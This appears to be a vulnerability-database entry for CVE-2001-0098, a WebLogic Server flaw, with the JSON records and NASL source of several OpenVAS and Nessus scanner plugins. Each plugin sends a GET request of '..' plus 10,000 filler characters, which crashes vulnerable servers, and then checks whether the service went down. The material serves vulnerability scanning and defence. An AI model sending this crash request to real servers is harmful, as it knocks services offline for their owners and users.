WebLogic Server DoS

2005-11-03T00:00:00

Description

Requesting an overly long URL starting with a double dot can crash certain version of WebLogic servers.

{"id": "OPENVAS:136141256231010697", "type": "openvas", "bulletinFamily": "scanner", "title": "WebLogic Server DoS", "description": "Requesting an overly long URL starting with a double dot\n can crash certain version of WebLogic servers.", "published": "2005-11-03T00:00:00", "modified": "2020-04-24T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231010697", "reporter": "Copyright (C) 2001 StrongHoldNet", "references": [], "cvelist": ["CVE-2001-0098"], "lastseen": "2020-04-29T19:47:15", "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2001-0098"]}, {"type": "nessus", "idList": ["1454.PRM", "WEBLOGIC_DOTDOTDOS.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:10697"]}], "rev": 4}, "score": {"value": -0.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2001-0098"]}, {"type": "nessus", "idList": ["WEBLOGIC_DOTDOTDOS.NASL"]}]}, "exploitation": null, "vulnersScore": -0.3}, "pluginID": "136141256231010697", "sourceData": "# OpenVAS Vulnerability Test\n# Description: WebLogic Server DoS\n#\n# Authors:\n# Vincent Renardias <vincent@strongholdnet.com>\n#\n# Copyright:\n# Copyright (C) 2001 StrongHoldNet\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nCPE = \"cpe:/a:oracle:weblogic_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.10697\");\n script_version(\"2020-04-24T10:02:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-24 10:02:39 +0000 (Fri, 24 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(2138);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2001-0098\");\n\n script_name(\"WebLogic Server DoS\");\n\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (C) 2001 StrongHoldNet\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_oracle_weblogic_consolidation.nasl\");\n script_mandatory_keys(\"oracle/weblogic/detected\");\n\n script_tag(name:\"solution\", value:\"Upgrade to at least WebLogic 5.1 with Service Pack 7\");\n\n script_tag(name:\"summary\", value:\"Requesting an overly long URL starting with a double dot\n can crash certain version of WebLogic servers.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\n\nif(!port = get_app_port(cpe: CPE, service: \"www\"))\n exit(0);\n\nif(!get_app_location(cpe: CPE, port: port, nofork: TRUE))\n exit(0);\n\nif(http_is_dead(port:port))\n exit(0);\n\nsoc = http_open_socket(port);\nif(!soc)\n exit(0);\n\nreq = http_get(item:string(\"..\", crap(10000)), port:port);\nsend(socket:soc, data:req);\nhttp_recv(socket:soc);\nhttp_close_socket(soc);\n\nif(http_is_dead(port:port)) {\n security_message(port:port);\n exit(0);\n}\n\nexit(99);\n", "naslFamily": "Denial of Service", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1646579253, "score": 1659797217}, "_internal": {"score_hash": "7d0306431c6b51aaa15cab5096a6250a"}}

{"nessus": [{"lastseen": "2023-01-11T14:17:20", "description": "Requesting an overly long URL starting with a double dot can crash certain versions of WebLogic servers or possibly even allow for arbitrary code execution.", "cvss3": {}, "published": "2001-06-21T00:00:00", "type": "nessus", "title": "WebLogic Server Double Dot GET Request Remote Overflow", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2001-0098"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:weblogic_server"], "id": "WEBLOGIC_DOTDOTDOS.NASL", "href": "https://www.tenable.com/plugins/nessus/10697", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# This script was written by Vincent Renardias <vincent@strongholdnet.com>\n#\n# Licence : GPL v2\n#\n\n# Changes by Tenable:\n# - Revised plugin title (4/13/2009)\n# - Added cpe, updated copyright (8/15/2012)\n# - Switched to the weblogic detect script, updated copyright (11/23/2015)\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(10697);\n script_version(\"1.35\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2001-0098\");\n script_bugtraq_id(2138);\n\n script_name(english:\"WebLogic Server Double Dot GET Request Remote Overflow\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is vulnerable to a buffer overflow attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"Requesting an overly long URL starting with a double dot can crash\ncertain versions of WebLogic servers or possibly even allow for\narbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2000/Dec/382\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to WebLogic 5.1 with Service Pack 7 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2000/12/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2001/06/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_DENIAL);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2001-2022 StrongHoldNet\");\n\n script_dependencies(\"weblogic_detect.nasl\");\n script_require_keys(\"www/weblogic\");\n script_require_ports(\"Services/www\", 80, 7001);\n\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"http_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"www/weblogic\");\nport = get_http_port(default:80, embedded:TRUE);\nget_kb_item_or_exit(\"www/weblogic/\" + port + \"/installed\");\n\nbanner = get_http_banner(port:port);\nif (!banner || \"WebLogic\" >!< banner) exit(0);\n\nif(get_port_state(port))\n{\n if(http_is_dead(port:port))exit(0);\n soc = http_open_socket(port);\n if(soc)\n {\n buffer = http_get(item:string(\"..\", crap(10000)), port:port);\n send(socket:soc, data:buffer);\n r = http_recv(socket:soc);\n http_close_socket(soc);\n \n if(http_is_dead(port:port, retry: 2))security_hole(port);\n }\n}\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:21:18", "description": "The remote WebLogic server can be disabled remotely by requesting a long URL starting with a double dot. ", "cvss3": {}, "published": "2004-08-20T00:00:00", "type": "nessus", "title": "WebLogic Server < 5.1 SP 7 \"..\" URL Handling Remote Overflow DoS", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2001-0098"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:bea:weblogic_server:*:*:*:*:*:*:*:*"], "id": "1454.PRM", "href": "https://www.tenable.com/plugins/nnm/1454", "sourceData": "Binary data 1454.prm", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T12:21:33", "description": "Buffer overflow in Bea WebLogic Server before 5.1.0 allows remote attackers to execute arbitrary commands via a long URL that begins with a \"..\" string.", "cvss3": {}, "published": "2001-02-12T05:00:00", "type": "cve", "title": "CVE-2001-0098", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2001-0098"], "modified": "2017-12-19T02:29:00", "cpe": ["cpe:/a:bea:weblogic_server:4.5.2"], "id": "CVE-2001-0098", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0098", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:bea:weblogic_server:4.5.2:sp2:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-12-08T11:44:13", "description": "Requesting an overly long URL starting with a double dot\ncan crash certain version of WebLogic servers.", "cvss3": {}, "published": "2005-11-03T00:00:00", "type": "openvas", "title": "WebLogic Server DoS", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2001-0098"], "modified": "2017-12-07T00:00:00", "id": "OPENVAS:10697", "href": "http://plugins.openvas.org/nasl.php?oid=10697", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: weblogic_dotdotdos.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: WebLogic Server DoS\n#\n# Authors:\n# Vincent Renardias <vincent@strongholdnet.com>\n#\n# Copyright:\n# Copyright (C) 2001 StrongHoldNet\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"Requesting an overly long URL starting with a double dot\ncan crash certain version of WebLogic servers.\";\n\ntag_solution = \"upgrade to at least WebLogic 5.1 with Service Pack 7\";\n\nif(description)\n{\n script_id(10697);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(2138);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2001-0098\");\n name = \"WebLogic Server DoS\";\n \n script_name(name);\n \n\n \n script_category(ACT_DENIAL);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n \n \n script_copyright(\"This script is Copyright (C) 2001 StrongHoldNet\");\n family = \"Remote file access\";\n script_family(family);\n script_dependencies(\"find_service.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"http_func.inc\");\n\nport = get_http_port(default:80);\n\n\nif(get_port_state(port))\n{\n if(http_is_dead(port:port))exit(0);\n soc = http_open_socket(port);\n if(soc)\n {\n buffer = http_get(item:string(\"..\", crap(10000)), port:port);\n send(socket:soc, data:buffer);\n r = http_recv(socket:soc);\n http_close_socket(soc);\n \n if(http_is_dead(port:port))security_message(port);\n }\n}\n\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}

WebLogic Server DoS

Description

Related